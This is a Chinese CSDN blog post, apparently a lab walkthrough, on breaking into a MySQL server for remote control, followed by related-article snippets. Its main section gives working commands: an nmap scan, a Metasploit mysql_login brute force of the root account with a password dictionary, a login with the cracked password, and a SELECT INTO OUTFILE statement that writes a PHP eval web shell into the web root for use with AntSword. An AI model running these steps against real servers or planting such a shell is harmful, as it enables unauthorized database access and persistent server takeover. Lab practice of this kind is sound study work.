mysql数据库入侵实现远程控制

最新推荐文章于 2024-08-14 15:09:27 发布
最新推荐文章于 2024-08-14 15:09:27 发布
阅读量256 收藏 1
点赞数
文章标签: 服务器 网络 linux mysql 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63651088/article/details/132939444
版权 
192.168.0.241 #本机IP
192.168.0.115 #靶机IP

先使用nmap工具对靶机进行扫描,发现3306端口开放,我这里用的是Windows下的zenmap工具

启动msfconsole(kali环境下自带)

search mysql_login #使用此模块
use 0
show options #查看参数

set pass_file D:/metasploit-framework/pass.txt #设置字典
set rhosts 192.168.0.115 #设置靶机地址
set username root #设置用户名
exploit #开始攻击

 

爆破出用户名root,密码123456

mysql -h 192.168.0.115 -u root -p #登录

 

如果是网站的数据库,还可以写入一句话木马,用中国蚁剑等工具连接

select '<?php @eval($_POST['a']);?>' into outfile '/var/www/shell.php';

 

谢氏理综集团
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
msf --攻击MySQL 和简单实用
代码审计
04-21 4240
msfdb run(可以自动链接数据库) hosts services use auxiliary/scanner/mysql/mysql_version set PASS_FILE /home/kali/Desktop/yui.txt set exploit 步骤 mysql 爆破 root 密码 mysql_udf 上传udf mysql_sql 将执行的语句进行hex ...
mysql入侵服务器_记通过mysql数据库成功入侵服务器内部的渗透实战
weixin_33127399的博客
01-19 1226
1,在成功进入mysql数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
mysql 5.0 入侵_mysql5.0入侵测试以及防范方法分享
weixin_35182280的博客
02-17 123
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:代码如下:grant all privileges on *.* to...
Mysql数据库入侵
无数个夜晚的博客
03-11 367
Mysql数据库被黑mysql 数据库只有RECOVER_DATABASES数据库密码简单导致Mysql数据库被黑 mysql 数据库只有RECOVER_DATABASES 数据库密码简单导致Mysql数据库被黑
教你一些MySQL数据库入侵及防御方法(有书送)
weixin_40581617的博客
06-08 5434
在针对网站渗透中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入、MySQL 提权、MySQL 数据库 Root 账号 webshell 获取等,但没有一个对 MySQL 数据库渗透较为全面的总结。针对这种情况我们开展了研究,但技术的进步永无止境,思想有多远,路就可以走多远,在研究 MySQL 数据库安全之余,我们也对 MySQL 如何通过 msf、sqlmap 等来进行扫描、漏洞利用...
对网易的一次入侵检测-可以看成是Jsp+mysql入侵
蓝法典的专栏
05-18 3212
已发表于黑客X档案BY 剑心[B.C.T]转载注明出处 163.com是国内一家比较出名的门户网站,提供包括邮箱等等在内的各种服务,这样繁多的服务,不知道会不会在哪些地方存在漏洞哦!正好最近学习了一些注入知识就想对这些门户网站做点小小的安全检测,不知道他们的脚本像不像他们名声一样那么厉害哦!废话就不说了,我们就去找那些传递参数的页面看看会不会不小心有那么一个参数没有过滤,那么我们就有空子可以钻了哦
Mysql数据库被黑客入侵,如何处理
CLanMua的博客
08-08 761
您的数据库已删除。您必须支付 0.0155 比特币 (BTC) 才能取回它们
mysql5.0入侵测试以及防范方法分享
09-10
首先,MySQL 5.0 入侵测试是指攻击者尝试访问和控制 MySQL 服务器的行为,而防范方法则是指保护 MySQL 服务器免受恶意攻击的措施。本文将详细介绍 MySQL 5.0 入侵测试的方法和防范方法。 一、MySQL 5.0 入侵测试 ...
MySQL数据库安全配置介绍第1/2页
12-15
MySQL数据库安全配置是确保...总之,MySQL数据库的安全配置是一个多层面的过程,涉及主机安全、权限控制、网络防护以及编程习惯等多个方面。系统管理员需要持续关注并实施这些措施,以确保数据的安全性和系统的稳定性。
六大步保护MySQL数据库中重要数据
03-03
标题中的“六大步保护MySQL数据库中重要数据”指的是在企业环境中,为了确保客户或产品信息等敏感数据的安全,系统管理员需要采取一系列措施来防御外部攻击和内部泄露。这些措施是针对MySQL数据库的,因为MySQL是一...
mysql5.7.32最新稳定版本
10-31
MySQL 5.7.32 是 MySQL 数据库管理系统的一个重要稳定版本,对于系统安全性和性能都有显著提升。在本文中,我们将深入探讨 MySQL 5.7.32 的主要特点、在 Linux 上的安装过程以及如何确保数据库安全性。 1. **...
作为一个mysql的系统员你有责任维护你的mysql数据库系统.docx
12-17
实现这两级安全性的关键在于实施严格的访问控制和持续监控。通过配置防火墙规则、使用入侵检测系统以及定期进行安全审计,可以有效地提高MySQL系统的安全性。同时,对系统管理员来说,定期培训和了解最新的安全威胁...
渗透————PHP+MYSQL数据库(下)
longger_lee
11-12 544
PHP+MYSQL的web,在5.0版本后注入有所不一样,由于5.0以后的版本自带information_schema.tables数据库,因此相较5.0之前注入简单。在上篇文章简要说明了注入技巧,也有提到过不同权限的注入,本文简要说明root权限及其更高权限下的注入。           1,在收集信息阶段,注入use(),爆出当前用户为root时,有两种方法进行入侵:           
端口入侵mysql_看紧你的3306端口,一次通过mysql入侵数据库教程 -电脑资料
weixin_30118919的博客
01-30 2887
mysql用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页,从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx.xxxget(回车)501 MethodNot ImplementedMethod Not Implementedget to /index.h...
通过mysql入侵win主机_通过mysql入侵NT和win2000
weixin_28956181的博客
02-05 98
通过mysql入侵NT和win2000作者:网络 来源:佚名 更新时间:2008-02-08 13:09:04点击:0by coolweiscoolweis@netguard.com.cn许多nt和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而iis的一些其他漏洞导致源代码泄漏也可能看到...
mysql提权入侵服务器_Mysql提权拿服务器
weixin_39606911的博客
02-02 461
最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。 接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。dedecms一般都在data目...
通过mysql命令 入侵_通过mysql入侵全过程.doc
weixin_29322049的博客
01-19 335
您所在位置:网站首页 > 海量文档&nbsp>&nbsp计算机&nbsp>&nbspPHP资料通过mysql入侵全过程.doc7页本文档一共被下载:次,您可全文免费在线阅读后下载本文档。 下载提示1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。2.该文档所得收入(下载+...
记一次mysql数据库入侵
hehehehao1的博客
11-16 304
mysql数据库被盗
Linux日常运维小结
最新发布
lza20001103的博客
08-14 973
Linux日常运维小结
详解MySQL数据库全方位安全策略与防范措施
Mysql数据库安全性问题释疑文档深入探讨了在信息技术环境中,MySQL数据库面临的关键安全挑战和策略。数据库安全性对于任何组织而言至关重要,尤其是在处理敏感数据时。本文首先强调了数据库安全的重要性,指出它是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢氏理综集团

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值